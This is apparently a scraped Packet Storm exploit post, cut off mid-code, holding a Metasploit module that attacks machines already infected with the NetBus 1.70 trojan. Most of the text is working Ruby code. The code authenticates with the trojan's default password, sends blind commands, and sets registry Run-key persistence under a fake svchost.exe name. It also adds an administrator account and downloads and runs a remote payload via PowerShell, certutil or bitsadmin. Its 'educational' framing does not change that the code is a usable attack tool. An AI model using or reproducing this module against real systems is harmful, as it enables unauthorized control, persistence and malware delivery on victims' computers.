{"id":32937,"date":"2025-12-26T11:45:40","date_gmt":"2025-12-26T11:45:40","guid":{"rendered":"http:\/\/localhost\/?p=32937"},"modified":"2025-12-26T11:45:40","modified_gmt":"2025-12-26T11:45:40","slug":"backdoorwin32netbus170-blind-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32937","title":{"rendered":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:59&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides historical\/educational exploitation of the Backdoor.Win32.Netbus.170 trojan, originally discovered in 1998. It represents a legacy proof-of-concept rather than a modern offensive security tool&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213311&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Backdoor.Win32.Netbus.170 Blind Command Execution\\n                                                                    |\\n    | # Author    : indoushka\\n                                                                    |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64\\n    bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available\\n                                                                    |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213263\/ \\u0026 MVID-2025-0703\\n    \\n    [+] Summary    : This Metasploit module provides historical\/educational\\n    exploitation of the Backdoor.Win32.Netbus.170 trojan, originally discovered\\n    in 1998.\\n                     It represents a legacy proof-of-concept rather than a\\n    modern offensive security tool.\\n    \\n    [+] Key points:\\n    \\n    This is not a native Windows vulnerability.\\n    It does not work on clean or properly configured systems.\\n    It requires existing malware, write permissions, and a trigger for\\n    execution.\\n    In real-world conditions, Windows system directories are protected and\\n    prevent this attack without administrative privileges.\\n    \\n    [+] What It Is :\\n    \\n    Backdoor.Win32.Netbus.170 is a detection name used by antivirus programs\\n    (like Kaspersky) for a variant of NetBus, a remote access Trojan (RAT) for\\n    Windows.\\n    The \u201c170\u201d generally refers to NetBus version 1.70 or a variant derived from\\n    it.\\n    \\n    [+] Origin :\\n    \\n    NetBus was originally created by Carl\u2011Fredrik Neikter in March 1998.\\n    Versions like 1.60 and 1.70 became widely known and later misused as\\n    backdoors.\\n    \\n    [+] Appearance :\\n    \\n    The Trojan itself is detected in Windows 32\u2011bit systems.\\n    Antivirus signatures identifying it (as Backdoor.Win32.Netbus.170) appeared\\n    in the 2000s, documented in Kaspersky and other AV databases.\\n    \\n    [+] Key Notes :\\n    \\n    NetBus allows remote control of infected machines via a client-server model.\\n    Classified as a Backdoor\/Trojan, it can compromise security if executed.\\n    \\n    [+] Technical Reality Check :\\n    \\n         Aspect                   Assessment                Impact\\n    Exploitation Method    Blind command execution     No output\/confirmation\\n    Reliability                  Very low             Fire-and-forget only\\n    Modern System Support        None             Windows 95\/98\/2000\/XP only\\n    Detection Risk            Extremely high         Easily detected by all\\n    security tools\\n    Practical Value           Academic\/Research only    Not for production use\\n    \\n    [+] Key Characteristics :\\n    \\n    [+] Critical Limitations:\\n    \\n        Blind Execution Only: No command output or confirmation\\n        No Interactive Shell: Single TCP connection, no session establishment\\n        Legacy Protocol: Plaintext authentication, no encryption\\n        Fire-and-Forget Model: Commands sent without verification\\n        Obsolete Targeting: Designed for Windows systems from 1998-2003 era\\n    \\n    Educational Value:\\n    \\n        Demonstrates early backdoor communication patterns\\n        Shows evolution from simple to complex malware\\n        Provides historical context for modern threat intelligence\\n        Useful for forensic and malware analysis training\\n    \\n    [+] How It Actually Works:\\n    \\n        Authentication: Sends plaintext password to TCP port 12631\/12632\\n        Command Execution: Uses StartApp;command format\\n        Success Assumption: If connection remains open, assumes command executed\\n        No Verification: Cannot confirm if commands actually run\\n    \\n    What It Cannot Do:\\n    \\n        Return command output\\n        Establish persistent sessions\\n        Work on modern Windows (7\/8\/10\/11)\\n        Evade modern security solutions\\n        Provide execution confirmation\\n    \\n    \\n    [+] Usage:\\n    \\n    # 1. Basic Check\\n    use exploit\/windows\/backdoor\/netbus_blind\\n    set RHOST 192.168.1.100\\n    set PASSWORD ecoli\\n    check\\n    \\n    # 2. Simple Test\\n    set ACTION test\\n    exploit\\n    \\n    # 3. Command Execution\\n    set ACTION execute\\n    set CMD \\&#8221;notepad.exe\\&#8221;\\n    exploit\\n    \\n    # 4. Create User (if applicable)\\n    set ACTION persist\\n    set CREATE_USER true\\n    set USERNAME testuser\\n    set USERPASS P@ssw0rd123\\n    exploit\\n    \\n    # 5. Simulation Mode (for Training)\\n    set SIMULATE_ONLY true\\n    set ACTION test\\n    exploit\\n    \\n    [+] PoC :\\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ManualRanking  # Blind execution \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\\n    \\n      include Msf::Exploit::Remote::Tcp\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;Backdoor.Win32.Netbus.170 Blind Command\\n    Execution&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits NetBus 1.70 backdoor via blind command\\n    execution.\\n            NetBus is a fire-and-forget backdoor that does NOT return any\\n    command output.\\n    \\n            CRITICAL LIMITATIONS:\\n            &#8211; No command output retrieval (blind execution only)\\n            &#8211; No interactive shell support\\n            &#8211; No execution confirmation\\n            &#8211; Commands may fail silently\\n            &#8211; Limited to Windows 95\/98\/2000\/XP era systems\\n    \\n            This module implements workarounds for modern systems but success\\n    is not guaranteed.\\n            Commands are sent as-is with no verification of execution.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;indoushka&#8217;,\\n            &#8216;Malvuln&#8217;, # 2025 advisory\\n            &#8216;Unknown&#8217;, # Original NetBus author (~1998)\\n            &#8216;Metasploit Community&#8217;\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;URL&#8217;, &#8216;\\n    https:\/\/malvuln.com\/advisory\/086f0693f81f6d40460c215717349a1f.txt&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/en.wikipedia.org\/wiki\/NetBus&#8217;],\\n            [&#8216;URL&#8217;, &#8216;https:\/\/packetstormsecurity.com\/files\/10149\/netbus.txt.html\\n    &#8216;]\\n          ],\\n          &#8216;DefaultOptions&#8217; =\\u003e {\\n            &#8216;SSL&#8217; =\\u003e false,\\n            &#8216;RPORT&#8217; =\\u003e 12631,\\n            &#8216;WfsDelay&#8217; =\\u003e 15,  # \u0648\u0642\u062a \u0623\u0637\u0648\u0644 \u0644\u0644\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0642\u062f\u064a\u0645\u0629\\n            &#8216;PAYLOAD&#8217; =\\u003e &#8216;windows\/exec&#8217;,\\n            &#8216;CMD&#8217; =\\u003e &#8216;calc.exe&#8217;  # \u0623\u0645\u0631 \u0627\u062e\u062a\u0628\u0627\u0631 \u0628\u0633\u064a\u0637\\n          },\\n          &#8216;Platform&#8217;       =\\u003e &#8216;win&#8217;,\\n          &#8216;Arch&#8217;           =\\u003e [ARCH_X86], # NetBus 1.70 \u0647\u0648 32-bit \u0641\u0642\u0637\\n          &#8216;Payload&#8217;        =\\u003e {\\n            &#8216;BadChars&#8217; =\\u003e \\&#8221;\\\\x00\\\\x0a\\\\x0d\\&#8221;,\\n            &#8216;Space&#8217; =\\u003e 1024,\\n            &#8216;DisableNops&#8217; =\\u003e true\\n          },\\n          &#8216;Targets&#8217;        =\\u003e [\\n            [\\n              &#8216;NetBus 1.70 (Windows 9x\/2000\/XP)&#8217;, {\\n                &#8216;DefaultOptions&#8217; =\\u003e {\\n                  &#8216;PAYLOAD&#8217; =\\u003e &#8216;windows\/exec&#8217;,\\n                  &#8216;CMD&#8217; =\\u003e &#8216;calc.exe&#8217;\\n                }\\n              }\\n            ]\\n          ],\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0,\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;1998-01-01&#8217;,\\n          &#8216;Notes&#8217;          =\\u003e {\\n            &#8216;Stability&#8217;   =\\u003e [CRASH_SERVICE_RESTARTS],  # \u0642\u062f \u064a\u062a\u0633\u0628\u0628 \u0641\u064a \u062a\u0639\u0637\u0644\\n            &#8216;Reliability&#8217; =\\u003e [SERVICE_RESOURCE_LOSS],   # \u062a\u0646\u0641\u064a\u0630 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\\n            &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],\\n            &#8216;AKA&#8217;         =\\u003e [&#8216;NetBus Pro 1.70&#8217;],\\n            &#8216;RelatedModules&#8217; =\\u003e [\\n              &#8216;exploit\/windows\/misc\/netbus_trojan&#8217;\\n            ]\\n          }\\n        ))\\n    \\n        register_options([\\n          OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;NetBus backdoor password&#8217;,\\n    &#8216;ecoli&#8217;]),\\n          OptInt.new(&#8216;ALTERNATE_PORT&#8217;, [false, &#8216;Alternate Netbus port&#8217;, 12632]),\\n          OptEnum.new(&#8216;ACTION&#8217;, [\\n            true,\\n            &#8216;Action to perform&#8217;,\\n            &#8216;test&#8217;,\\n            [&#8216;test&#8217;, &#8216;execute&#8217;, &#8216;persist&#8217;, &#8216;remove&#8217;, &#8216;custom&#8217;]\\n          ]),\\n          OptString.new(&#8216;CMD&#8217;, [false, &#8216;Command to execute (for execute\/custom\\n    actions)&#8217;, &#8216;calc.exe&#8217;]),\\n          OptString.new(&#8216;CUSTOM_PAYLOAD&#8217;, [false, &#8216;Custom payload\/command&#8217;]),\\n          OptBool.new(&#8216;TRY_POWERSHELL&#8217;, [false, &#8216;Attempt PowerShell commands&#8217;,\\n    false]),\\n          OptBool.new(&#8216;CREATE_USER&#8217;, [false, &#8216;Create user account if possible&#8217;,\\n    false]),\\n          OptString.new(&#8216;USERNAME&#8217;, [false, &#8216;Username to create&#8217;, &#8216;msfuser&#8217;]),\\n          OptString.new(&#8216;USERPASS&#8217;, [false, &#8216;Password for new user&#8217;,\\n    &#8216;P@ssw0rd123&#8217;])\\n        ])\\n    \\n        register_advanced_options([\\n          OptBool.new(&#8216;BLIND_MODE&#8217;, [true, &#8216;Assume blind execution (no\\n    confirmation)&#8217;, true]),\\n          OptInt.new(&#8216;CMD_DELAY&#8217;, [true, &#8216;Delay between commands (seconds)&#8217;,\\n    3]),\\n          OptBool.new(&#8216;RETRY_FAILED&#8217;, [false, &#8216;Retry failed commands&#8217;, false]),\\n          OptInt.new(&#8216;MAX_RETRIES&#8217;, [false, &#8216;Maximum retry attempts&#8217;, 2]),\\n          OptBool.new(&#8216;SIMULATE_ONLY&#8217;, [false, &#8216;Simulate commands without\\n    execution&#8217;, false]),\\n          OptString.new(&#8216;TEMP_DIR&#8217;, [false, &#8216;Temporary directory path&#8217;,\\n    &#8216;%TEMP%&#8217;])\\n        ])\\n      end\\n    \\n      def check\\n        print_status(\\&#8221;=== NetBus 1.70 Backdoor Check ===\\&#8221;)\\n        print_status(\\&#8221;Target: #{rhost}:#{rport}\\&#8221;)\\n        print_warning(\\&#8221;This is BLIND CHECK &#8211; No output will be received!\\&#8221;)\\n    \\n        check_result = Exploit::CheckCode::Safe\\n    \\n        begin\\n          print_status(\\&#8221;Attempting connection&#8230;\\&#8221;)\\n          connect\\n    \\n          # Send authentication\\n          auth_cmd = \\&#8221;Password;0;#{datastore[&#8216;PASSWORD&#8217;]}\\\\r\\\\n\\&#8221;\\n          sock.put(auth_cmd)\\n    \\n          # Wait briefly for any response (NetBus rarely responds)\\n          response = sock.get_once(-1, 2) rescue nil\\n    \\n          if response \\u0026\\u0026 !response.empty?\\n            print_good(\\&#8221;Received response: #{response.strip}\\&#8221;)\\n    \\n            # Check for known NetBus responses\\n            if response =~ \/Authenticated|OK|Welcome|NetBus\/i\\n              check_result = Exploit::CheckCode::Vulnerable\\n            else\\n              check_result = Exploit::CheckCode::Detected\\n            end\\n          else\\n            # No response &#8211; typical NetBus behavior\\n            print_status(\\&#8221;No response received (typical for NetBus)\\&#8221;)\\n    \\n            # Try a simple test command\\n            print_status(\\&#8221;Testing with simple command&#8230;\\&#8221;)\\n            test_cmd = \\&#8221;StartApp;cmd.exe \/c echo . \\u003e nul\\\\r\\\\n\\&#8221;\\n            sock.put(test_cmd)\\n            Rex.sleep(2)\\n    \\n            # Check if connection is still alive\\n            if sock \\u0026\\u0026 !sock.closed?\\n              print_warning(\\&#8221;Connection maintained &#8211; NetBus may be present\\&#8221;)\\n              check_result = Exploit::CheckCode::Appears\\n            else\\n              print_error(\\&#8221;Connection closed unexpectedly\\&#8221;)\\n            end\\n          end\\n    \\n        rescue ::Errno::ECONNREFUSED\\n          print_error(\\&#8221;Connection refused &#8211; port may be closed\\&#8221;)\\n        rescue ::Errno::ETIMEDOUT\\n          print_error(\\&#8221;Connection timeout\\&#8221;)\\n        rescue ::Rex::ConnectionError =\\u003e e\\n          print_error(\\&#8221;Connection error: #{e.message}\\&#8221;)\\n        rescue ::Exception =\\u003e e\\n          print_error(\\&#8221;Unexpected error: #{e.class}: #{e.message}\\&#8221;)\\n        ensure\\n          disconnect rescue nil\\n        end\\n    \\n        # Try alternate port if primary failed\\n        if check_result == Exploit::CheckCode::Safe \\u0026\\u0026\\n    datastore[&#8216;ALTERNATE_PORT&#8217;]\\n          print_status(\\&#8221;Trying alternate port\\n    #{datastore[&#8216;ALTERNATE_PORT&#8217;]}&#8230;\\&#8221;)\\n          begin\\n            connect(true, {&#8216;RPORT&#8217; =\\u003e datastore[&#8216;ALTERNATE_PORT&#8217;]})\\n            sock.put(\\&#8221;Password;0;#{datastore[&#8216;PASSWORD&#8217;]}\\\\r\\\\n\\&#8221;)\\n            Rex.sleep(2)\\n    \\n            if sock \\u0026\\u0026 !sock.closed?\\n              print_warning(\\&#8221;Alternate port #{datastore[&#8216;ALTERNATE_PORT&#8217;]}\\n    accepts connections\\&#8221;)\\n              check_result = Exploit::CheckCode::Appears\\n            end\\n          rescue\\n            # Ignore errors for alternate port\\n          ensure\\n            disconnect rescue nil\\n          end\\n        end\\n    \\n        print_status(\\&#8221;Check completed: #{check_result}\\&#8221;)\\n        return check_result\\n      end\\n    \\n      def exploit\\n        print_warning(\\&#8221;=\\&#8221; * 70)\\n        print_warning(\\&#8221;NETBUS BLIND EXECUTION MODULE\\&#8221;)\\n        print_warning(\\&#8221;=\\&#8221; * 70)\\n        print_warning(\\&#8221;IMPORTANT: This is BLIND execution &#8211; NO output will be\\n    received!\\&#8221;)\\n        print_warning(\\&#8221;Commands are sent with NO confirmation of execution.\\&#8221;)\\n        print_warning(\\&#8221;Success is assumed if no connection errors occur.\\&#8221;)\\n        print_warning(\\&#8221;=\\&#8221; * 70)\\n    \\n        if datastore[&#8216;SIMULATE_ONLY&#8217;]\\n          print_status(\\&#8221;SIMULATION MODE &#8211; No commands will be executed\\&#8221;)\\n          simulate_exploit\\n          return\\n        end\\n    \\n        # Establish connection\\n        unless connect_to_netbus\\n          print_error(\\&#8221;Failed to establish NetBus connection\\&#8221;)\\n          return\\n        end\\n    \\n        # Perform selected action\\n        case datastore[&#8216;ACTION&#8217;]\\n        when &#8216;test&#8217;\\n          execute_test\\n        when &#8216;execute&#8217;\\n          execute_command\\n        when &#8216;persist&#8217;\\n          establish_persistence\\n        when &#8216;remove&#8217;\\n          remove_backdoor\\n        when &#8216;custom&#8217;\\n          execute_custom\\n        end\\n    \\n        print_status(\\&#8221;Exploitation sequence completed.\\&#8221;)\\n        print_warning(\\&#8221;REMEMBER: This was BLIND execution &#8211; verify results\\n    manually!\\&#8221;)\\n      end\\n    \\n      def connect_to_netbus\\n        print_status(\\&#8221;Establishing NetBus connection&#8230;\\&#8221;)\\n    \\n        ports = [datastore[&#8216;RPORT&#8217;], datastore[&#8216;ALTERNATE_PORT&#8217;]].compact.uniq\\n        connected = false\\n    \\n        ports.each do |port|\\n          next unless port\\n    \\n          begin\\n            disconnect rescue nil\\n    \\n            print_status(\\&#8221;Trying port #{port}&#8230;\\&#8221;)\\n            connect(true, {\\n              &#8216;RPORT&#8217; =\\u003e port,\\n              &#8216;Timeout&#8217; =\\u003e 10,\\n              &#8216;CPORT&#8217; =\\u003e 1025 + rand(64510)\\n            })\\n    \\n            # Send authentication\\n            auth_cmd = \\&#8221;Password;0;#{datastore[&#8216;PASSWORD&#8217;]}\\\\r\\\\n\\&#8221;\\n            sock.put(auth_cmd)\\n            Rex.sleep(2)\\n    \\n            # Check if connection is alive\\n            if sock \\u0026\\u0026 !sock.closed?\\n              print_good(\\&#8221;Connected to port #{port}\\&#8221;)\\n    \\n              # Test with simple command\\n              test_cmd = \\&#8221;StartApp;cmd.exe \/c echo . \\u003e nul\\\\r\\\\n\\&#8221;\\n              sock.put(test_cmd)\\n              Rex.sleep(1)\\n    \\n              if sock \\u0026\\u0026 !sock.closed?\\n                print_good(\\&#8221;Connection test successful\\&#8221;)\\n                @active_port = port\\n                connected = true\\n                break\\n              end\\n            end\\n    \\n          rescue ::Rex::ConnectionError =\\u003e e\\n            print_error(\\&#8221;Port #{port}: #{e.message}\\&#8221;)\\n          ensure\\n            disconnect unless connected \\u0026\\u0026 @active_port == port\\n          end\\n        end\\n    \\n        if connected\\n          print_status(\\&#8221;Using port #{@active_port} for commands\\&#8221;)\\n          return true\\n        else\\n          print_error(\\&#8221;Failed to connect to any NetBus port\\&#8221;)\\n          return false\\n        end\\n      end\\n    \\n      def execute_test\\n        print_status(\\&#8221;=== EXECUTING TEST COMMANDS ===\\&#8221;)\\n        print_warning(\\&#8221;These are BLIND commands &#8211; no output will be seen!\\&#8221;)\\n    \\n        test_commands = [\\n          \\&#8221;StartApp;calc.exe\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StartApp;notepad.exe\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StartApp;cmd.exe \/c echo test \\u003e nul\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StartApp;cmd.exe \/c dir C:\\\\\\\\ \\u003e nul\\\\r\\\\n\\&#8221;\\n        ]\\n    \\n        test_commands.each_with_index do |cmd, index|\\n          print_status(\\&#8221;Test #{index + 1}\/#{test_commands.length}:\\n    #{cmd.strip}\\&#8221;)\\n    \\n          begin\\n            sock.put(cmd)\\n            Rex.sleep(datastore[&#8216;CMD_DELAY&#8217;])\\n    \\n            # Check if connection is still alive\\n            if sock \\u0026\\u0026 !sock.closed?\\n              print_good(\\&#8221;  Command sent (connection alive)\\&#8221;)\\n            else\\n              print_error(\\&#8221;  Connection lost after command\\&#8221;)\\n              reconnect_if_needed\\n            end\\n          rescue ::Exception =\\u003e e\\n            print_error(\\&#8221;  Failed: #{e.message}\\&#8221;)\\n            reconnect_if_needed\\n          end\\n        end\\n    \\n        print_status(\\&#8221;Test sequence completed\\&#8221;)\\n      end\\n    \\n      def execute_command\\n        cmd = datastore[&#8216;CMD&#8217;]\\n        if cmd.blank?\\n          cmd = &#8216;calc.exe&#8217;\\n          print_warning(\\&#8221;No command specified, using default: #{cmd}\\&#8221;)\\n        end\\n    \\n        print_status(\\&#8221;=== EXECUTING COMMAND ===\\&#8221;)\\n        print_warning(\\&#8221;Command: #{cmd}\\&#8221;)\\n        print_warning(\\&#8221;This is BLIND execution &#8211; no output will be seen!\\&#8221;)\\n    \\n        # Format command for NetBus\\n        netbus_cmd = \\&#8221;StartApp;#{cmd}\\\\r\\\\n\\&#8221;\\n    \\n        retries = 0\\n        max_retries = datastore[&#8216;RETRY_FAILED&#8217;] ? datastore[&#8216;MAX_RETRIES&#8217;] : 0\\n    \\n        begin\\n          print_status(\\&#8221;Sending command&#8230;\\&#8221;)\\n          sock.put(netbus_cmd)\\n          Rex.sleep(datastore[&#8216;CMD_DELAY&#8217;])\\n    \\n          if sock \\u0026\\u0026 !sock.closed?\\n            print_good(\\&#8221;Command sent successfully\\&#8221;)\\n            print_status(\\&#8221;Assuming command executed (BLIND mode)\\&#8221;)\\n          else\\n            print_error(\\&#8221;Connection lost during command execution\\&#8221;)\\n            if retries \\u003c max_retries\\n              retries += 1\\n              print_status(\\&#8221;Retrying (#{retries}\/#{max_retries})&#8230;\\&#8221;)\\n              reconnect_if_needed\\n              retry\\n            end\\n          end\\n    \\n        rescue ::Exception =\\u003e e\\n          print_error(\\&#8221;Command execution failed: #{e.message}\\&#8221;)\\n          if retries \\u003c max_retries\\n            retries += 1\\n            print_status(\\&#8221;Retrying (#{retries}\/#{max_retries})&#8230;\\&#8221;)\\n            Rex.sleep(2)\\n            reconnect_if_needed\\n            retry\\n          end\\n        end\\n      end\\n    \\n      def establish_persistence\\n        print_status(\\&#8221;=== ESTABLISHING PERSISTENCE ===\\&#8221;)\\n        print_warning(\\&#8221;Creating artifacts (files, registry entries, tasks)\\&#8221;)\\n        print_warning(\\&#8221;Cleanup may be required if CLEANUP is disabled\\&#8221;)\\n    \\n        persistence_methods = []\\n    \\n        # Simple persistence methods compatible with older systems\\n        persistence_methods \\u003c\\u003c \\&#8221;StartApp;cmd.exe \/c copy\\n    C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\calc.exe \\\\\\&#8221;%TEMP%\\\\\\\\svchost.exe\\\\\\&#8221;\\\\r\\\\n\\&#8221;\\n        persistence_methods \\u003c\\u003c \\&#8221;StartApp;reg add\\n    \\\\\\&#8221;HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\&#8221; \/v Update \/t\\n    REG_SZ \/d \\\\\\&#8221;%TEMP%\\\\\\\\svchost.exe\\\\\\&#8221; \/f\\\\r\\\\n\\&#8221;\\n    \\n        # For newer systems (if PowerShell is available)\\n        if datastore[&#8216;TRY_POWERSHELL&#8217;]\\n          persistence_methods \\u003c\\u003c \\&#8221;StartApp;powershell -Command \\\\\\&#8221;Copy-Item\\n    &#8216;C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\calc.exe&#8217; -Destination\\n    &#8216;$env:TEMP\\\\\\\\svchost.exe&#8217;\\\\\\&#8221;\\\\r\\\\n\\&#8221;\\n          persistence_methods \\u003c\\u003c \\&#8221;StartApp;powershell -Command\\n    \\\\\\&#8221;New-ItemProperty -Path\\n    &#8216;HKCU:\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run&#8217; -Name &#8216;Update&#8217;\\n    -Value &#8216;$env:TEMP\\\\\\\\svchost.exe&#8217; -PropertyType String -Force\\\\\\&#8221;\\\\r\\\\n\\&#8221;\\n        end\\n    \\n        # Create user if requested\\n        if datastore[&#8216;CREATE_USER&#8217;]\\n          username = datastore[&#8216;USERNAME&#8217;]\\n          userpass = datastore[&#8216;USERPASS&#8217;]\\n    \\n          persistence_methods \\u003c\\u003c \\&#8221;StartApp;net user #{username} #{userpass}\\n    \/add\\\\r\\\\n\\&#8221;\\n          persistence_methods \\u003c\\u003c \\&#8221;StartApp;net localgroup administrators\\n    #{username} \/add\\\\r\\\\n\\&#8221;\\n        end\\n    \\n        persistence_methods.each_with_index do |cmd, index|\\n          print_status(\\&#8221;Persistence step #{index +\\n    1}\/#{persistence_methods.length}&#8230;\\&#8221;)\\n    \\n          begin\\n            sock.put(cmd)\\n            Rex.sleep(datastore[&#8216;CMD_DELAY&#8217;])\\n    \\n            if sock \\u0026\\u0026 !sock.closed?\\n              print_good(\\&#8221;  Step completed (assumed)\\&#8221;)\\n            else\\n              print_error(\\&#8221;  Connection lost\\&#8221;)\\n              break\\n            end\\n          rescue ::Exception =\\u003e e\\n            print_error(\\&#8221;  Failed: #{e.message}\\&#8221;)\\n          end\\n        end\\n    \\n        print_status(\\&#8221;Persistence sequence completed\\&#8221;)\\n        print_warning(\\&#8221;Artifacts created: Check manually for verification\\&#8221;)\\n      end\\n    \\n      def remove_backdoor\\n        print_status(\\&#8221;=== ATTEMPTING TO REMOVE NETBUS ===\\&#8221;)\\n        print_warning(\\&#8221;Removal is NOT reliable with NetBus\\&#8221;)\\n    \\n        # Various removal commands (none are guaranteed)\\n        removal_attempts = [\\n          \\&#8221;RemoveServer;1\\\\r\\\\n\\&#8221;,\\n          \\&#8221;RemoveServer;\\\\r\\\\n\\&#8221;,\\n          \\&#8221;UnloadServer;1\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StopServer;1\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StartApp;taskkill \/f \/im keyhook.exe 2\\u003enul\\\\r\\\\n\\&#8221;,\\n          \\&#8221;StartApp;taskkill \/f \/im netbus.exe 2\\u003enul\\\\r\\\\n\\&#8221;\\n        ]\\n    \\n        removal_attempts.each_with_index do |cmd, index|\\n          print_status(\\&#8221;Removal attempt #{index +\\n    1}\/#{removal_attempts.length}: #{cmd.strip}\\&#8221;)\\n    \\n          begin\\n            sock.put(cmd)\\n            Rex.sleep(2)\\n    \\n            # Try to verify removal by attempting to reconnect\\n            if index == removal_attempts.length &#8211; 1  # Last attempt\\n              sock.put(\\&#8221;Password;0;#{datastore[&#8216;PASSWORD&#8217;]}\\\\r\\\\n\\&#8221;)\\n              Rex.sleep(1)\\n    \\n              begin\\n                response = sock.get_once(-1, 1)\\n                if response.nil?\\n                  print_good(\\&#8221;  No response &#8211; backdoor may be removed\\&#8221;)\\n                else\\n                  print_warning(\\&#8221;  Still responding &#8211; removal may have failed\\&#8221;)\\n                end\\n              rescue\\n                print_good(\\&#8221;  Connection error &#8211; backdoor may be removed\\&#8221;)\\n              end\\n            end\\n    \\n          rescue ::Exception =\\u003e e\\n            print_error(\\&#8221;  Failed: #{e.message}\\&#8221;)\\n          end\\n        end\\n    \\n        print_status(\\&#8221;Removal attempts completed\\&#8221;)\\n        print_warning(\\&#8221;Manual verification required!\\&#8221;)\\n      end\\n    \\n      def execute_custom\\n        custom_cmd = datastore[&#8216;CUSTOM_PAYLOAD&#8217;]\\n        if custom_cmd.blank?\\n          print_error(\\&#8221;No custom payload specified\\&#8221;)\\n          return\\n        end\\n    \\n        print_status(\\&#8221;=== EXECUTING CUSTOM PAYLOAD ===\\&#8221;)\\n        print_warning(\\&#8221;Payload: #{custom_cmd}\\&#8221;)\\n    \\n        # Handle different payload types\\n        if custom_cmd.start_with?(&#8216;http:\/\/&#8217;, &#8216;https:\/\/&#8217;)\\n          # URL download and execute\\n          execute_download_payload(custom_cmd)\\n        elsif custom_cmd.include?(&#8216;.exe&#8217;) || custom_cmd.include?(&#8216;.dll&#8217;)\\n          # Assume it&#8217;s a file execution\\n          execute_file_payload(custom_cmd)\\n        else\\n          # Treat as direct command\\n          netbus_cmd = \\&#8221;StartApp;#{custom_cmd}\\\\r\\\\n\\&#8221;\\n          execute_blind_command(netbus_cmd, \\&#8221;Custom payload\\&#8221;)\\n        end\\n      end\\n    \\n      def execute_download_payload(url)\\n        print_status(\\&#8221;Downloading payload from: #{url}\\&#8221;)\\n    \\n        # Simple download methods\\n        download_methods = []\\n    \\n        # Method 1: PowerShell\\n        if datastore[&#8216;TRY_POWERSHELL&#8217;]\\n          ps_cmd = \\&#8221;powershell -Command \\\\\\&#8221;(New-Object\\n    Net.WebClient).DownloadFile(&#8216;#{url}&#8217;, &#8216;$env:TEMP\\\\\\\\payload.exe&#8217;);\\n    Start-Process &#8216;$env:TEMP\\\\\\\\payload.exe&#8217;\\\\\\&#8221;\\&#8221;\\n          download_methods \\u003c\\u003c \\&#8221;StartApp;#{ps_cmd}\\\\r\\\\n\\&#8221;\\n        end\\n    \\n        # Method 2: Certutil\\n        certutil_cmd = \\&#8221;cmd.exe \/c certutil -urlcache -split -f \\\\\\&#8221;#{url}\\\\\\&#8221;\\n    \\\\\\&#8221;%TEMP%\\\\\\\\payload.exe\\\\\\&#8221; \\u0026\\u0026 start \\\\\\&#8221;\\\\\\&#8221; \\\\\\&#8221;%TEMP%\\\\\\\\payload.exe\\\\\\&#8221;\\&#8221;\\n        download_methods \\u003c\\u003c \\&#8221;StartApp;#{certutil_cmd}\\\\r\\\\n\\&#8221;\\n    \\n        # Method 3: Bitsadmin (Windows 7+)\\n        bits_cmd = \\&#8221;cmd.exe \/c bitsadmin \/transfer job \/download \/priority high\\n    \\\\\\&#8221;#{url}\\\\\\&#8221; \\\\\\&#8221;%TEMP%\\\\\\\\payload.exe\\\\\\&#8221; \\u0026\\u0026 start \\\\\\&#8221;\\\\\\&#8221; \\\\\\&#8221;%TEMP%\\\\\\\\payload.exe\\\\\\&#8221;\\&#8221;\\n        download_methods \\u003c\\u003c \\&#8221;StartApp;#{bits_cmd}\\\\r\\\\n\\&#8221;\\n    \\n        download_methods.each_with_index do |cmd, index|\\n          print_status(\\&#8221;Trying download method #{index + 1}&#8230;\\&#8221;)\\n          if execute_blind_command(cmd, \\&#8221;Download method #{index + 1}\\&#8221;)\\n            print_good(\\&#8221;Download command sent\\&#8221;)\\n            break\\n          end\\n        end\\n      end\\n    \\n      def 